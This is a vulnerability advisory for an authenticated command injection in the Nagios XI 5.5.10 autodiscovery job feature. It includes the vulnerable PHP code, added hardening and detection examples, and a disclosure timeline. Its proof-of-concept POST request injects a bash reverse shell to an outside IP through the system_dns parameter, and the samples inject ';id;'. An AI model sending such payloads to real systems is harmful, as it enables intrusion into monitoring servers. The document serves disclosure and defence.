Nagios XI 5.5.10 Autodiscovery Authenticated Remote Code Execution
Summary
Command injection in Nagios XI before 5.5.11 allows authenticated users to execute arbitrary remote commands via a new autodiscovery job.
Product Description (from vendor)
“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.
CVE(s)
Details
Root Cause Analysis
Autodiscovery jobs allow a user to set up a scheduled scan of a specific subnet, along with many other options. That functionality resides in nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php, where the function autodiscovery_component_get_cmdline handles the user-provided parameters and returns the shell command to run:
```php
<?php
function autodiscovery_component_get_cmdline($jobid){
[...]
    // <-- raw, user-supplied value from the job definition
    $system_dns = grab_array_var($jarr, "system_dns", "off");
[...]
    // only the literal "on" is rewritten; any other value is kept verbatim
    if ($system_dns == "on") {
        $system_dns = "--system-dns=1";
    }
[...]
    // <-- $system_dns is concatenated into the shell command without quoting or escaping
    $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\" --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . " " . $topod . " " . $scan_delay . " " . $system_dns . " > " . $out_file . " 2>&1 & echo $!";
    return $cmd;
}
```
Since the system_dns value is neither validated nor sanitized, an authenticated user who sends a malicious system_dns HTTP POST parameter to the autodiscovery endpoint can execute arbitrary commands on the Nagios XI host.
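The following is an added example, not code from the advisory or from Nagios, of how a command-line builder of this shape can be hardened: each on/off toggle is mapped to a fixed flag string and the raw value is never used, the scan delay is restricted to digits, and every free-form value is wrapped in escapeshellarg() so the shell treats it as a single quoted word. The function names, the flag names other than --system-dns=1 (--osdetection, --topology, --scandelay) and the file paths are assumptions for illustration; the advisory notes that the vendor's actual patch was not verified, so this is not a description of it.

```php
<?php
// Added example (not the vendor's code or patch): a hardened command-line builder.
// Function names, flag names other than --system-dns=1, and paths are assumptions.

// Map an on/off toggle to a fixed flag. Anything other than "on" yields "",
// so the raw user value can never reach the shell string.
function ad_toggle_flag(string $value, string $flag): string
{
    return $value === "on" ? $flag : "";
}

// Accept only a non-negative integer for the scan delay; reject everything else.
function ad_scan_delay_flag(string $value): string
{
    if ($value === "" || !ctype_digit($value)) {
        return "";
    }
    return "--scandelay=" . (int) $value;   // assumed flag name
}

// Build the command with every free-form value passed through escapeshellarg(),
// which single-quotes the argument so shell metacharacters in it are inert.
function ad_build_cmdline(array $job, string $script_dir, string $xml_file, string $watch_file, string $out_file): string
{
    $address = escapeshellarg($job["address"] ?? "");
    $exclude = escapeshellarg($job["exclude_address"] ?? "");
    $osd     = ad_toggle_flag($job["os_detection"] ?? "off", "--osdetection=1");   // assumed flag
    $topod   = ad_toggle_flag($job["topology_detection"] ?? "off", "--topology=1"); // assumed flag
    $dns     = ad_toggle_flag($job["system_dns"] ?? "off", "--system-dns=1");
    $delay   = ad_scan_delay_flag($job["scandelay"] ?? "");

    // The paths are internal, not user input, but quoting them costs nothing.
    $parts = [
        "rm -f " . escapeshellarg($xml_file),
        "touch " . escapeshellarg($watch_file),
        "sudo /usr/bin/php " . escapeshellarg($script_dir . "autodiscover_new.php")
            . " --addresses=" . $address
            . " --exclude=" . $exclude
            . " --output=" . escapeshellarg($xml_file)
            . " --watch=" . escapeshellarg($watch_file)
            . " --onlynew=0 --debug=1"
            . ($osd   !== "" ? " " . $osd   : "")
            . ($topod !== "" ? " " . $topod : "")
            . ($delay !== "" ? " " . $delay : "")
            . ($dns   !== "" ? " " . $dns   : "")
            . " > " . escapeshellarg($out_file) . " 2>&1 & echo $!",
    ];
    return implode("; ", $parts);
}

// Constructed job whose system_dns carries shell metacharacters, the class of
// value the original code would have concatenated verbatim.
$job = [
    "address"            => "192.168.1",
    "exclude_address"    => "",
    "os_detection"       => "on",
    "topology_detection" => "",
    "scandelay"          => "",
    "system_dns"         => "; id;",
];
// Paths below are constructed placeholders.
echo ad_build_cmdline($job, "/path/to/scripts/", "/tmp/job.xml", "/tmp/job.watch", "/tmp/job.out"), "\n";
// The "; id;" value is dropped entirely: only a literal "on" produces --system-dns=1.
```

The design point is that a toggle should select between two constant strings rather than be edited in place: the original code rewrites only the "on" case and lets every other value through, which is exactly the gap the injected parameter exploits. Quoting free-form arguments with escapeshellarg() (rather than escapeshellcmd() inside hand-written double quotes) is the safer primitive for the address fields, independently of whether those fields are reachable.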
Proof of Concept
- Edit the following HTTP request with the correct cookie and reverse shell parameters and send it:

```http
POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1
Host: nagiosxi.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Connection: close
Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2

update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&m=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton=
```

- Notice a TCP reverse shell is spawned with Nagios XI privileges.
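As an added detection example (not part of the advisory), the check below inspects captured request bodies for the autodiscovery job endpoint and flags any on/off toggle parameter whose value is something other than "on", "off" or empty, which is what an injected system_dns looks like after URL decoding. It assumes you have POST bodies available from a WAF, reverse proxy or request log; the two request bodies in the block are constructed samples, not captures.

```php
<?php
// Added detection example (not from the advisory): flag autodiscovery job
// submissions whose on/off toggles carry anything other than on/off/empty.
// The request bodies below are constructed samples.

const AD_TOGGLE_PARAMS = ["system_dns", "os_detection", "topology_detection"];

// Returns a list of "param=value" strings for toggles that are not plain on/off values.
function ad_suspicious_toggles(string $body): array
{
    parse_str($body, $params);   // URL-decodes the form body, so %3b becomes ";"
    $hits = [];
    foreach (AD_TOGGLE_PARAMS as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        if ($value !== "" && $value !== "on" && $value !== "off") {
            $hits[] = $name . "=" . $value;
        }
    }
    return $hits;
}

// Constructed sample bodies: a normal job and one carrying shell metacharacters.
$samples = [
    "benign"    => "update=1&job=-1&address=192.168.1&os_detection=on&system_dns=off&topology_detection=",
    "injection" => "update=1&job=-1&address=192.168.1&os_detection=on&system_dns=%3bid%3b&topology_detection=",
];
foreach ($samples as $label => $body) {
    $hits = ad_suspicious_toggles($body);
    printf("%-10s %s\n", $label, $hits ? "ALERT " . implode(", ", $hits) : "ok");
}
```

Run against real traffic, the "benign" case prints "ok" and the second prints an alert naming system_dns with the decoded ";id;" value. Because the rule keys on the parameter's expected value space rather than on a specific payload, it also catches variants that do not use the reverse-shell string from the proof of concept.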
Impact
An authenticated attacker with autodiscovery job creation privileges can gain remote code execution on the Nagios XI host.
Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)
Disclosure Timeline
This report was subject to Shielder’s disclosure policy:
- 20/02/2019:
- Vulnerability report is sent to vendor
- Vendor acknowledges issue and begins triage process
- 28/02/2019: Vendor releases Nagios XI 5.5.11
- 10/04/2019: Shielder’s advisory is made public
Credits
`polict` of Shielder
This advisory was first published on https://www.shielder.com/it/advisories/nagiosxi-autodiscovery-auth-rce/